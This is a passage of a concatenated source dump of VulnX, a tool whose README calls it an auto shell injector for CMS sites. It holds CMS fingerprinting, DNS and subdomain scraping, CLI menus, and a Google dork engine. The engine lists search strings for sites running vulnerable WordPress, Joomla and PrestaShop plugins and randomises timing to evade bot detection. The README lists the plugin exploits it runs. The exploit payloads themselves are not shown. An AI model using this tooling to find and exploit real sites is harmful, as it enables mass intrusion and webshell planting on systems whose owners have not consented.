%s----------------%s".format( 96 | **entry) % (good, good, good, bannerblue, end))) 97 | print(' %s Search for MX Records ' % que) 98 | for entry in res['dns_records']['mx']: 99 | print((" %s Host : {domain} \n %s IP : {ip} \n %s AS : {as} \n %s----------------%s".format( 100 | **entry) % (good, good, good, bannerblue, end))) 101 | 102 | 103 | def domain_info(url): 104 | domain = hostd(url) 105 | dnsdumpster_url = 'https://dnsdumpster.com/' 106 | response = requests.Session().get(dnsdumpster_url).text 107 | # If no match is found, the return object won't have group method, so check. 108 | try: 109 | csrf_token = re.search( 110 | r"name='csrfmiddlewaretoken' value='(.*?)'", response).group(1) 111 | except AttributeError: # No match is found 112 | csrf_token = re.search( 113 | r"name='csrfmiddlewaretoken' value='(.*?)'", response) 114 | cookies = {'csrftoken': csrf_token} 115 | headers = {'Referer': 'https://dnsdumpster.com/'} 116 | data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain} 117 | response = requests.Session().post('https://dnsdumpster.com/', 118 | cookies=cookies, data=data, headers=headers) 119 | image = requests.get('https://dnsdumpster.com/static/map/%s.png' % domain) 120 | if response.status_code == 200: 121 | soup = BeautifulSoup(response.content, 'html.parser') 122 | tables = soup.findAll('table') 123 | res = {} 124 | res['domain'] = domain 125 | res['dns_records'] = {} 126 | res['dns_records']['host'] = results(tables[3]) 127 | print(' %s SubDomains' % que) 128 | for entry in res['dns_records']['host']: 129 | print((" %s SubDomain : {domain} \n %s IP : {ip} \n %s----------------%s".format( 130 | **entry) % (good, good, bannerblue, end))) 131 | -------------------------------------------------------------------------------- /modules/cli/helpers.py: -------------------------------------------------------------------------------- 1 | class Helpers(): 2 | 3 | @staticmethod 4 | def _general_help(): 5 | print(""" 6 | Command Description 7 | -------- ------------- 8 | help/? Show this help menu. 9 | clear/cls clear the vulnx screen 10 | use Use an variable. 11 | info Get information about an available variable. 12 | set Sets a context-specific variable to a value to use while using vulnx. 13 | variables Prints all previously specified variables. 14 | banner Display banner. 15 | history Display command-line most important history from the beginning. 16 | makerc Save command-line history to a file. 17 | exec Execute a system command without closing the vulnx-mode 18 | exit/quit Exit the vulnx-mode 19 | """) 20 | 21 | @staticmethod 22 | def _url_action_help(): 23 | print(""" 24 | Command Description 25 | -------- ------------- 26 | help/? Show this help menu. 27 | timeout set timeout 28 | ports scan ports 29 | domain get domains & sub domains 30 | cms info get cms info (version , user ..) 31 | web info get web info 32 | dump dns dump dns get sub domains [mx-server..] 33 | run exploit run exploits corresponding to cms 34 | clear/cls clear the vulnx screen 35 | history Display command-line most important history from the beginning. 36 | variables Prints all previously specified variables. 37 | back move back from current context 38 | """) 39 | 40 | # dorks - command helpers. 41 | 42 | @staticmethod 43 | def _dorks_action_help(): 44 | print(""" 45 | Command Description 46 | -------- ------------- 47 | help/? Show this help menu. 48 | list list dorks 49 | set dork set exploit name 50 | clear/cls clear the vulnx screen 51 | history Display command-line most important history from the beginning. 52 | variables Prints all previously specified variables. 53 | exec Execute a system command without closing the vulnx-mode 54 | back move back from current context 55 | """) 56 | 57 | @staticmethod 58 | def _dorks_setdork_help(): 59 | print(""" 60 | Command Description 61 | -------- ------------- 62 | help/? Show this help menu. 63 | pages set num page 64 | output output file. 65 | run search web with specified dork 66 | clear/cls clear the vulnx screen 67 | history Display command-line most important history from the beginning. 68 | variables Prints all previously specified variables. 69 | exec Execute a system command without closing the vulnx-mode 70 | back move back from current context 71 | """) 72 | 73 | @staticmethod 74 | def _dorks_setdork_page_help(): 75 | print(""" 76 | Command Description 77 | -------- ------------- 78 | help/? Show this help menu. 79 | output output file. 80 | run search web with specified dork 81 | clear/cls clear the vulnx screen 82 | exec Execute a system command without closing the vulnx-mode 83 | history Display command-line most important history from the beginning. 84 | variables Prints all previously specified variables. 85 | back move back from current context 86 | """) 87 | 88 | @staticmethod 89 | def _dorks_setdork_output_help(): 90 | print(""" 91 | Command Description 92 | -------- ------------- 93 | help/? Show this help menu. 94 | pages set num page 95 | run search web with specified dork 96 | exec Execute a system command without closing the vulnx-mode 97 | clear/cls clear the vulnx screen 98 | history Display command-line most important history from the beginning. 99 | variables Prints all previously specified variables. 100 | back move back from current context 101 | """) 102 | 103 | @staticmethod 104 | def _dorks_setdork_page_output_help(): 105 | print(""" 106 | Command Description 107 | -------- ------------- 108 | help/? Show this help menu. 109 | run search web with specified dork 110 | clear/cls clear the vulnx screen 111 | exec Execute a system command without closing the vulnx-mode 112 | history Display command-line most important history from the beginning. 113 | variables Prints all previously specified variables. 114 | back move back from current context 115 | """) 116 | -------------------------------------------------------------------------------- /vulnx.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python 3 | 4 | from __future__ import (absolute_import, division, print_function) 5 | 6 | """ 7 | The vulnx main part. 8 | Author: anouarbensaad 9 | Desc : CMS-Detector and Vulnerability Scanner & exploiter 10 | Copyright (c) 11 | See the file 'LICENSE' for copying permission 12 | """ 13 | 14 | from modules.detector import CMS 15 | from modules.dorks.engine import Dork 16 | from modules.dorks.helpers import DorkManual 17 | from modules.cli.cli import CLI 18 | from common.colors import red, green, bg, G, R, W, Y, G, good, bad, run, info, end, que, bannerblue2 19 | 20 | from common.requestUp import random_UserAgent 21 | from common.uriParser import parsing_url as hostd 22 | from common.banner import banner 23 | 24 | import sys 25 | import argparse 26 | import re 27 | import os 28 | import socket 29 | import common 30 | import warnings 31 | import signal 32 | import requests 33 | 34 | HEADERS = { 35 | 'User-Agent': random_UserAgent(), 36 | 'Content-type' : '*/*', 37 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 38 | 'Accept-Language': 'en-US,en;q=0.5', 39 | 'Connection': 'keep-alive', 40 | } 41 | 42 | warnings.filterwarnings( 43 | action="ignore", message=".*was already imported", category=UserWarning) 44 | warnings.filterwarnings(action="ignore", category=DeprecationWarning) 45 | 46 | # cleaning screen 47 | 48 | banner() 49 | 50 | def parser_error(errmsg): 51 | print("Usage: python " + sys.argv[0] + " [Options] use -h for help") 52 | print(R + "Error: " + errmsg + W) 53 | sys.exit() 54 | 55 | 56 | def parse_args(): 57 | parser = argparse.ArgumentParser( 58 | epilog='\tExample: \r\npython ' + sys.argv[0] + " -u google.com") 59 | parser.error = parser_error 60 | parser._optionals.title = "\nOPTIONS" 61 | parser.add_argument('-u', '--url', help="url target to scan") 62 | parser.add_argument( 63 | '-D', '--dorks', help='search webs with dorks', dest='dorks', type=str) 64 | parser.add_argument( 65 | '-o', '--output', help='specify output directory', required=False) 66 | parser.add_argument('-n', '--number-pages', 67 | help='search dorks number page limit', dest='numberpage', type=int) 68 | parser.add_argument('-i', '--input', help='specify input file of domains to scan', dest='input_file', required=False) 69 | parser.add_argument('-l', '--dork-list', help='list names of dorks exploits', dest='dorkslist', 70 | choices=['wordpress', 'prestashop', 'joomla', 'lokomedia', 'drupal', 'all']) 71 | parser.add_argument('-p', '--ports', help='ports to scan', 72 | dest='scanports', type=int) 73 | # Switches 74 | parser.add_argument('-e', '--exploit', help='searching vulnerability & run exploits', 75 | dest='exploit', action='store_true') 76 | parser.add_argument('--it', help='interactive mode.', 77 | dest='cli', action='store_true') 78 | 79 | parser.add_argument('--cms', help='search cms info[themes,plugins,user,version..]', 80 | dest='cms', action='store_true') 81 | 82 | parser.add_argument('-w', '--web-info', help='web informations gathering', 83 | dest='webinfo', action='store_true') 84 | parser.add_argument('-d', '--domain-info', help='subdomains informations gathering', 85 | dest='subdomains', action='store_true') 86 | parser.add_argument('--dns', help='dns informations gatherings', 87 | dest='dnsdump', action='store_true') 88 | 89 | return parser.parse_args() 90 | 91 | # args declaration 92 | args = parse_args() 93 | # url arg 94 | url = args.url 95 | # input_file 96 | input_file = args.input_file 97 | # Disable SSL related warnings 98 | warnings.filterwarnings('ignore') 99 | 100 | def detection(): 101 | 102 | instance = CMS( 103 | url, 104 | headers=HEADERS, 105 | exploit=args.exploit, 106 | domain=args.subdomains, 107 | webinfo=args.webinfo, 108 | serveros=True, 109 | cmsinfo=args.cms, 110 | dnsdump=args.dnsdump, 111 | port=args.scanports 112 | ) 113 | instance.instanciate() 114 | 115 | def dork_engine(): 116 | if args.dorks: 117 | DEngine = Dork( 118 | exploit=args.dorks, 119 | headers=HEADERS, 120 | pages=(args.numberpage or 1) 121 | ) 122 | DEngine.search() 123 | 124 | def dorks_manual(): 125 | if args.dorkslist: 126 | DManual = DorkManual( 127 | select=args.dorkslist 128 | ) 129 | DManual.list() 130 | 131 | def interactive_cli(): 132 | if args.cli: 133 | cli = CLI(headers=HEADERS) 134 | cli.general("") 135 | 136 | def signal_handler(signal, frame): 137 | print("%s(ID: {}) Cleaning up...\n Exiting...".format(signal) % (W)) 138 | exit(0) 139 | 140 | signal.signal(signal.SIGINT, signal_handler) 141 | 142 | if __name__ == "__main__": 143 | 144 | dork_engine() 145 | dorks_manual() 146 | interactive_cli() 147 | 148 | if url: 149 | root = url 150 | if root.startswith('http://'): 151 | url = root 152 | elif root.startswith('https://'): 153 | url = root 154 | # url=root.replace('https://','http://') 155 | else: 156 | url = 'https://'+root 157 | print(url) 158 | detection() 159 | 160 | if input_file: 161 | with open(input_file,'r') as urls: 162 | u_array = [url.strip('\n') for url in urls] 163 | try: 164 | for url in u_array: 165 | root = url 166 | #url condition entrypoint 167 | if root.startswith('http'): 168 | url = root 169 | else: 170 | url = 'https://'+root 171 | detection() 172 | urls.close() 173 | except Exception as error: 174 | print('error : '+error) -------------------------------------------------------------------------------- /modules/detector.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python 3 | 4 | from __future__ import (absolute_import, division, print_function) 5 | 6 | from common.colors import W,B,Y,good,end,run,info 7 | from modules.executor.Wordpress import Wordpress 8 | from modules.executor.Magento import Magento 9 | from modules.executor.Prestashop import Prestashop 10 | from modules.executor.Lokomedia import Lokomedia 11 | from modules.executor.Lokomedia2 import Lokomedia2 12 | from modules.executor.Drupal import Drupal 13 | from modules.executor.Joomla import Joomla 14 | from modules.executor.Uknown import Uknown 15 | from modules.executor.Opencart import Opencart 16 | 17 | import re,requests,time 18 | 19 | 20 | class CMS(object): 21 | 22 | def __init__( 23 | self,url, 24 | headers=None, 25 | exploit=False, 26 | domain=False, 27 | webinfo=False, 28 | serveros=False, 29 | cmsinfo=False, 30 | dnsdump=False, 31 | port=False 32 | ): 33 | 34 | self.url = url 35 | self.headers = headers 36 | self.exploit = exploit 37 | self.domain = domain 38 | self.webinfo = webinfo 39 | self.serveros = serveros 40 | self.cmsinfo = cmsinfo 41 | self.dnsdump = dnsdump 42 | self.port = port 43 | 44 | 45 | def __getlmcontent__(self): 46 | lm_content = self.url + '/smiley/1.gif' 47 | return requests.get(lm_content, headers=self.headers,verify=False).text 48 | 49 | def __getlm2content__(self): 50 | lm2_content = self.url + '/rss.xml' 51 | return requests.get(lm2_content, headers=self.headers,verify=False).text 52 | 53 | def __getcontent__(self): 54 | return requests.get(self.url, headers=self.headers,verify=False).text 55 | 56 | def __getexploit__(self): 57 | if self.exploit: 58 | return True 59 | 60 | def __getdomain__(self): 61 | if self.domain: 62 | return True 63 | 64 | def __getwebinfo__(self): 65 | if self.webinfo: 66 | return True 67 | 68 | def __getserveros__(self): 69 | if self.serveros: 70 | return True 71 | 72 | def __getcmsinfo__(self): 73 | if self.cmsinfo: 74 | return True 75 | 76 | def __getdnsdump__(self): 77 | if self.dnsdump: 78 | return True 79 | 80 | def __getport__(self): 81 | if self.port: 82 | return self.port 83 | 84 | def detect(self): 85 | """ 86 | this module to detect cms & return type of cms. 87 | & make instance of cms. 88 | """ 89 | if re.search(re.compile(r'|/media/system/js/|com_content|Joomla!'), self.__getcontent__()): 90 | name = 'Joomla' 91 | return name 92 | 93 | elif re.search(re.compile(r'wp-content|wordpress|xmlrpc.php'), self.__getcontent__()): 94 | name = 'Wordpress' 95 | return name 96 | elif re.search(re.compile(r'Drupal|drupal|sites/all|drupal.org'), self.__getcontent__()): 97 | name = 'Drupal' 98 | return name 99 | 100 | elif re.search(re.compile(r'Prestashop|prestashop'), self.__getcontent__()): 101 | name = 'Prestashop' 102 | return name 103 | elif re.search(re.compile(r'route=product|OpenCart|route=common|catalog/view/theme'), self.__getcontent__()): 104 | name = 'Opencart' 105 | return name 106 | 107 | elif re.search(re.compile(r'Log into Magento Admin Page|name=\"dummy\" id=\"dummy\"|Magento'), self.__getcontent__()): 108 | name = 'Magento' 109 | return name 110 | elif re.search(re.compile(r'image/gif'), self.__getlmcontent__()): 111 | name = 'Lokomedia1' 112 | return name 113 | 114 | elif re.search(re.compile(r'lokomedia'), self.__getlm2content__()): 115 | name = 'Lokomedia2' 116 | return name 117 | else: 118 | name = 'Uknown' 119 | return name 120 | 121 | def serialize(self): 122 | result = dict( 123 | name=self.detect(), 124 | exploit=self.__getexploit__(), 125 | domain=self.__getdomain__(), 126 | webinfo=self.__getwebinfo__(), 127 | serveros=self.__getserveros__(), 128 | cmsinfo=self.__getcmsinfo__(), 129 | dnsdump=self.__getdnsdump__(), 130 | port=self.__getport__() 131 | ) 132 | return result 133 | 134 | def instanciate(self): 135 | init_time = time.time() 136 | cms = self.serialize() 137 | if cms['name']: 138 | instance = eval(cms['name'])(self.url,self.headers) 139 | print ('\n {0}[{1}Target{2}]{3} => {4}{5} \n '.format(B,W,B, W, self.url, end)) 140 | print ("{0} −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−".format(W)) 141 | print (' {0} looking for cms' .format(run)) 142 | print (' {0} CMS : {1}' .format(good , cms['name'])) 143 | if cms['exploit']: 144 | print ("{0} −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−".format(W)) 145 | print(' {0} Exploits Scan'.format(run)) 146 | instance.exploit() 147 | if cms['webinfo']: 148 | print ("{0} −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−".format(W)) 149 | print(' {0} OS / Server Information'.format(run)) 150 | instance.webinfo() 151 | if cms['serveros']: 152 | print ("{0} −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−".format(W)) 153 | print(' {0} Web Hosting Information'.format(run)) 154 | instance.serveros() 155 | if cms['cmsinfo']: 156 | print ("{0} −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−".format(W)) 157 | print(' {0} CMS Information Gathering'.format(run)) 158 | instance.cmsinfo() 159 | print ("{0} −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−".format(W)) 160 | if cms['dnsdump']: 161 | instance.dnsdump() 162 | if cms['domain']: 163 | instance.domaininfo() 164 | if cms['port']: 165 | instance.ports(cms['port']) 166 | end_time = time.time() 167 | elapsed_time = end_time - init_time 168 | print('\n %s[%s Elapsed Time %s]%s => %.2f seconds ' % (Y,W,Y,W,elapsed_time)) -------------------------------------------------------------------------------- /modules/dorks/engine.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python 3 | 4 | from __future__ import (absolute_import, division, print_function) 5 | 6 | ''' 7 | Dorks Engine Module. 8 | github Repository : http://github.com/anouarbensaad/findorks 9 | ''' 10 | 11 | import requests 12 | import re 13 | import time 14 | import random 15 | import os 16 | from common.colors import run, W, end, good, bad, que, info, bannerblue 17 | from common.uriParser import parsing_url as parsify 18 | output_dirdorks = 'logs'+'/Dorks' 19 | 20 | #if not os.path.exists(output_dirdorks): # if the directory doesn't exist 21 | # os.mkdir(output_dirdorks) # create a new directory 22 | # export = open('%s/%s.txt' % (output_dirdorks, filename), 'w') 23 | #else: 24 | # export = open('%s/%s.txt' % (output_dirdorks, filename), 'w') 25 | 26 | 27 | wp_contentdorks = { 28 | 'blaze': 'inurl:"/wp-content/plugins/blaze-slide-show-for-wordpress/"', 29 | 'catpro': 'inurl:"/wp-content/plugins/wp-catpro/"', 30 | 'cherry': 'inurl:"/wp-content/plugins/cherry-plugin/"', 31 | 'dm': 'inurl:"/wp-content/plugins/downloads-manager/"', 32 | 'fromcraft': 'inurl:"/wp-content/plugins/formcraft/file-upload/"', 33 | 'synoptic': 'inurl:"/wp-content/themes/synoptic/lib/avatarupload"', 34 | 'shop': 'inurl:"/wp-content/plugins/wpshop/includes/"', 35 | 'revslider': 'inurl "/wp-content/plugins/revslider/"', 36 | 'adsmanager': 'inurl:"/wp-content/plugins/simple-ads-manager/"', 37 | 'inboundiomarketing': 'inurl:"/wp-content/plugins/inboundio-marketing/"', 38 | 'thumbslider': 'inurl:"/wp-content/plugins/wp-responsive-thumbnail-slider"', 39 | } 40 | wp_admindorks = { 41 | 'wysija': 'inurl:"/wp-admin/admin-post.php?page=wysija_campaigns"', 42 | 'powerzoomer': 'inurl:"/wp-admin/admin.php?page=powerzoomer_manage"', 43 | 'showbiz': 'inurl:"/wp-admin/admin-ajax.php"', 44 | } 45 | 46 | wpajx = { 47 | 'jobmanager': 'inurl:"/jm-ajax/upload_file/"', 48 | } 49 | 50 | 51 | wpindex = { 52 | 'injection': 'inurl:"/index.php/wp-json/wp/"', 53 | } 54 | 55 | 56 | joomla = { 57 | 'comjce': 'inurl:"index.php?option=com_jce"', 58 | 'comfabrik': 'inurl:"index.php?option=com_fabrik"', 59 | 'comjdownloads': 'inurl:"index.php?option=com_fabrik"', 60 | 'comfoxcontact': 'inurl:"index.php?option=com_foxcontact"', 61 | } 62 | 63 | prestashop = { 64 | 'columnadverts': 'inurl:"/modules/columnadverts/"', 65 | 'soopabanners': 'inurl:"/modules/soopabanners/"', 66 | 'vtslide': 'inurl:"/modules/soopabanners/"', 67 | 'simpleslideshow': 'inurl:"/modules/simpleslideshow/"', 68 | 'productpageadverts': 'inurl:"/modules/productpageadverts/"', 69 | 'productpageadvertsb': 'inurl:"/modules/homepageadvertise2/"', 70 | 'jro_homepageadvertise': 'inurl:"/modules/jro_homepageadvertise/"', 71 | 'attributewizardpro': 'inurl:"/modules/attributewizardpro/"', 72 | 'oneattributewizardpro': 'inurl:"/modules/1attributewizardpro/"', 73 | 'attributewizardpro_old': 'inurl:"/modules/attributewizardpro.OLD/"', 74 | 'attributewizardpro_x': 'inurl:"/modules/attributewizardpro_x/"', 75 | 'advancedslider': 'inurl:"/modules/advancedslider/"', 76 | 'cartabandonmentpro': 'inurl:"/modules/cartabandonmentpro/"', 77 | 'cartabandonmentpro_old': 'inurl:"/modules/cartabandonmentproOld/"', 78 | 'videostab': 'inurl:"/modules/videostab/"', 79 | 'wg24themeadministration': 'inurl:"/modules//wg24themeadministration/"', 80 | 'fieldvmegamenu': 'inurl:"/modules/fieldvmegamenu/"', 81 | 'wdoptionpanel': 'inurl:"/modules/wdoptionpanel/"', 82 | 'pk_flexmenu': 'inurl:"/modules/pk_flexmenu/"', 83 | 'pk_vertflexmenu': 'inurl:"/modules/pk_vertflexmenu/"', 84 | 'nvn_export_orders': 'inurl:"/modules/nvn_export_orders/"', 85 | 'tdpsthemeoptionpanel': 'inurl:"/modules/tdpsthemeoptionpanel/"', 86 | 'masseditproduct': 'inurl:"/modules/lib/redactor/"', 87 | } 88 | 89 | 90 | class Dork: 91 | 92 | def __init__(self,headers=None,exploit=None,pages=1): 93 | self.headers = headers 94 | self.exploit = exploit 95 | self.pages = pages 96 | 97 | def __setdork__(self): 98 | 99 | ''' 100 | this method to set the right dork from the exploit name. 101 | ''' 102 | if self.exploit is None: 103 | return dict( 104 | message='This exploit not valid' 105 | ) 106 | else: 107 | if self.exploit in wp_contentdorks: 108 | return dict( 109 | dork=wp_contentdorks[self.exploit] 110 | ) 111 | if self.exploit in wp_admindorks: 112 | return dict( 113 | dork=wp_admindorks[self.exploit] 114 | ) 115 | if self.exploit in wpajx: 116 | return dict( 117 | dork=wpajx[self.exploit] 118 | ) 119 | if self.exploit in wpindex: 120 | return dict( 121 | dork=wpindex[self.exploit] 122 | ) 123 | if self.exploit in joomla: 124 | return dict( 125 | dork=joomla[self.exploit] 126 | ) 127 | if self.exploit in prestashop: 128 | return dict( 129 | dork=prestashop[self.exploit] 130 | ) 131 | 132 | def __finddork__(self,content): 133 | webs = [] 134 | if self.exploit in wp_contentdorks: 135 | dorks = re.findall(re.compile( 136 | r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/?/wp-content/plugins/\w+'), content) 137 | if len(dorks) > 0: 138 | for web in dorks: 139 | if web not in webs: 140 | webs.append(web) 141 | for i in range(len(webs)): 142 | domains = parsify(webs[i]) 143 | print(' {0} URL : {1} ' .format(good, webs[i])) 144 | print(' {0} DOMAIN: {1} ' .format(good, domains)) 145 | elif self.exploit in wp_admindorks: 146 | dorks = re.findall(re.compile( 147 | r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/?/wp-admin/\w+'), content) 148 | if len(dorks) > 0: 149 | for web in dorks: 150 | if web not in webs: 151 | webs.append(web) 152 | for i in range(len(webs)): 153 | domains = parsify(webs[i]) 154 | print(' {0} URL : {1} ' .format(good, webs[i])) 155 | print(' {0} DOMAIN: {1} ' .format(good, domains)) 156 | elif self.exploit in wpajx: 157 | dorks = re.findall(re.compile( 158 | r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/?/jm-ajax/upload_file/'), content) 159 | if len(dorks) > 0: 160 | for web in dorks: 161 | if web not in webs: 162 | webs.append(web) 163 | for i in range(len(webs)): 164 | domains = parsify(webs[i]) 165 | print(' {0} URL : {1} ' .format(good, webs[i])) 166 | print(' {0} DOMAIN: {1} ' .format(good, domains)) 167 | elif self.exploit in wpindex: 168 | dorks = re.findall(re.compile( 169 | r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/index.php/wp-json/wp/'), content) 170 | if len(dorks) > 0: 171 | for web in dorks: 172 | if web not in webs: 173 | webs.append(web) 174 | for i in range(len(webs)): 175 | domains = parsify(webs[i]) 176 | print(' {0} URL : {1} ' .format(good, webs[i])) 177 | print(' {0} DOMAIN: {1} ' .format(good, domains)) 178 | elif self.exploit in joomla: 179 | dorks = re.findall(re.compile( 180 | r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/index.php?option=com_jce'), content) 181 | if len(dorks) > 0: 182 | for web in dorks: 183 | if web not in webs: 184 | webs.append(web) 185 | for i in range(len(webs)): 186 | domains = parsify(webs[i]) 187 | print(' {0} URL : {1} ' .format(good, webs[i])) 188 | print(' {0} DOMAIN: {1} ' .format(good, domains)) 189 | elif self.exploit in prestashop: 190 | dorks = re.findall(re.compile( 191 | r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/?/modules/\w+'), content) 192 | if len(dorks) > 0: 193 | for web in dorks: 194 | if web not in webs: 195 | webs.append(web) 196 | for i in range(len(webs)): 197 | domains = parsify(webs[i]) 198 | print(' {0} URL : {1} ' .format(good, webs[i])) 199 | print(' {0} DOMAIN: {1} ' .format(good, domains)) 200 | 201 | 202 | def detect_captcha(self,content): 203 | 204 | ''' 205 | this method to detect if there is a captcha or not. 206 | - randomize the time of query 207 | - randomize the header and user-agent. to skip the detection. 208 | ''' 209 | if (re.findall(re.compile(r'CAPTCHA'), content)): 210 | return True 211 | else: 212 | return False 213 | 214 | def _google_singlepage_(self): 215 | 216 | print(' {0} Page N° 1 '.format(info)) 217 | set_dork = self.__setdork__() 218 | google_query = 'https://www.google.com/search?q=' + set_dork['dork'] 219 | print(' {0} searching for : {1}' .format(que, google_query)) 220 | response = requests.get(google_query,headers=self.headers,verify=False).text 221 | return response 222 | 223 | def _google_multipage_(self,num_p): 224 | 225 | print(' {0} Page n° {1} ' .format(info, num_p/10+1)) 226 | set_dork = self.__setdork__() 227 | google_query = 'https://www.google.com/search?q=' + set_dork['dork']+'&start='+str(num_p) 228 | print(' %s searching for : %s' % (que, google_query)) 229 | response = requests.get(google_query, headers=self.headers).text 230 | return response 231 | 232 | def search(self): 233 | pages = self.pages*10 234 | try: 235 | for number_page in range(0,pages,10): 236 | init_time = time.time() 237 | if number_page == 0: 238 | time.sleep(random.randint(1,2)) 239 | if self.detect_captcha(self._google_singlepage_()): 240 | print(' {0} Bot Detected The block will expire shortly' .format(bad)) 241 | else: 242 | self.__finddork__(self._google_singlepage_()) 243 | else: 244 | time.sleep(random.randint(3,5)) 245 | if self.detect_captcha(self._google_multipage_(number_page)): 246 | print(' {0} Bot Detected The block will expire shortly' .format(bad)) 247 | else: 248 | self.__finddork__(self._google_multipage_(number_page)) 249 | end_time = time.time() 250 | elapsed_time = end_time - init_time 251 | print(' %s Elapsed Time : %.2f seconds' % (info, elapsed_time)) 252 | except Exception as msg: 253 | print(' %s exploitname %s ' % (bad, msg)) 254 | number_page = +10 255 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

2 |
3 | VulnX 4 |
5 | VulnX 6 |
7 |

8 | 9 |

Vulnx 🕷️ is An Intelligent Bot Auto Shell Injector that detects vulnerabilities in multiple types of Cms

10 | 11 |

12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 |

27 | 28 | ![Screenshot from 2019-06-19 05-22-04](https://user-images.githubusercontent.com/23563528/59736664-7c2fed00-9252-11e9-936d-53ea02628711.png) 29 | 30 | https://github.com/anouarbensaad/vulnx/archive/master.zip 31 |

32 | VulnX Wiki • 33 | How To Use • 34 | Compatibility • 35 | Library • 36 |

37 | 38 | **Vulnx** is An Intelligent Bot Auto [Shell Injector](https://github.com/anouarbensaad/vulnx/wiki/Usage#run-exploits) that detects vulnerabilities in multiple types of Cms, fast cms detection,informations gathering and vulnerabilitie Scanning of the target like subdomains, ipaddresses, country, org, timezone, region, ans and more ... 39 | 40 | Instead of injecting each and every shell manually like all the other tools do, VulnX analyses the target website checking the presence of a vulnerabilitie if so the shell will be Injected.searching urls with [dorks](https://github.com/anouarbensaad/vulnx/wiki/Usage#searching-dorks) Tool. 41 | 42 | ------------------------------------- 43 | 44 | ### _🕷️ Features_ 45 | 46 | - Detects cms (wordpress, joomla, prestashop, drupal, opencart, magento, lokomedia) 47 | - Target informations gatherings 48 | - Target Subdomains gathering 49 | - Multi-threading on demand 50 | - Checks for vulnerabilities 51 | - Auto shell injector 52 | - Exploit dork searcher 53 | - [`Ports Scan`](https://user-images.githubusercontent.com/23563528/58365946-40a83a00-7ec3-11e9-87c5-055ed67109b7.jpg) High Level 54 | - [`Dns`](https://user-images.githubusercontent.com/23563528/58365784-09388e00-7ec1-11e9-8a05-e71fa39f146d.png)-Servers Dump 55 | - Input multiple target to scan. 56 | - Dorks Listing by Name& by ExploitName. 57 | - Export multiple target from Dorks into a logfile. 58 | 59 | ------------------------------------- 60 | 61 | 62 | ### _🕷️ DNS-Map-Results_ 63 | 64 | To do this,run a scan with the --dns flag and -d for subdomains. 65 | To generate a map of isetso.rnu.tn, you can run the command 66 | `vulnx -u isetso.rnu.tn --dns -d --output $PATH`in a new terminal. 67 | 68 | `$PATH` : Where the graphs results will be stored. 69 | 70 | ![vokoscreen-2019-06-19_05-44-07](https://user-images.githubusercontent.com/23563528/59737395-696ae780-9255-11e9-9e09-26416de89bee.gif) 71 | 72 | 73 | Let's generates an image displaying target Subdomains,MX & DNS data. 74 | 75 | 76 | ![demo](https://i.ibb.co/WfdhvWC/isetso-rnu-tn.png) 77 | 78 | ------------------------------------- 79 | 80 | ### _🕷️ Exploits_ 81 |

82 | Exploits Running 83 |

84 | 85 | ##### Joomla 86 | - [x] [Com Jce ]('#') 87 | - [x] [Com Jwallpapers ]('#') 88 | - [x] [Com Jdownloads ]('#') 89 | - [x] [Com Jdownloads2 ]('#') 90 | - [x] [Com Weblinks ]('#') 91 | - [x] [Com Fabrik ]('#') 92 | - [x] [Com Fabrik2 ]('#') 93 | - [x] [Com Jdownloads Index]('#') 94 | - [x] [Com Foxcontact ]('#') 95 | - [x] [Com Blog ]('#') 96 | - [x] [Com Users ]('#') 97 | - [x] [Com Ads Manager ]('#') 98 | - [x] [Com Sexycontactform]('#') 99 | - [x] [Com Media ]('#') 100 | - [x] [Mod_simplefileupload]('#') 101 | - [x] [Com Facileforms ]('#') 102 | - [x] [Com Facileforms ]('#') 103 | - [x] [Com extplorer ]('#') 104 | 105 | ##### Wordpress 106 | - [x] [Simple Ads Manager ](https://www.exploit-db.com/exploits/36614) 107 | - [x] [InBoundio Marketing ](https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_inboundio_marketing_file_upload) 108 | - [x] [WPshop eCommerce ](https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_wpshop_ecommerce_file_upload) 109 | - [x] [Synoptic ](https://cxsecurity.com/issue/WLB-2017030099) 110 | - [x] [Showbiz Pro ](https://www.exploit-db.com/exploits/35385) 111 | - [x] [Job Manager ](https://www.exploit-db.com/exploits/45031) 112 | - [x] [Formcraft ](https://www.exploit-db.com/exploits/30002) 113 | - [x] [PowerZoom ](http://www.exploit4arab.org/exploits/399) 114 | - [x] [Download Manager ](https://www.exploit-db.com/exploits/35533) 115 | - [x] [CherryFramework ](https://www.exploit-db.com/exploits/45896) 116 | - [x] [Catpro ](https://vulners.com/zdt/1337DAY-ID-20256) 117 | - [x] [Blaze SlideShow ](https://0day.today/exploits/18500) 118 | - [x] [Wysija-Newsletters ](https://www.exploit-db.com/exploits/33991) 119 | 120 | ##### Drupal 121 | - [ ] [Add Admin ]('#') 122 | - [ ] [Drupal BruteForcer ]('#') 123 | - [ ] [Drupal Geddon2 ]('#') 124 | 125 | ##### PrestaShop 126 | - [x] [attributewizardpro ]('#') 127 | - [x] [columnadverts ]('#') 128 | - [ ] [soopamobile ]('#') 129 | - [x] [pk_flexmenu 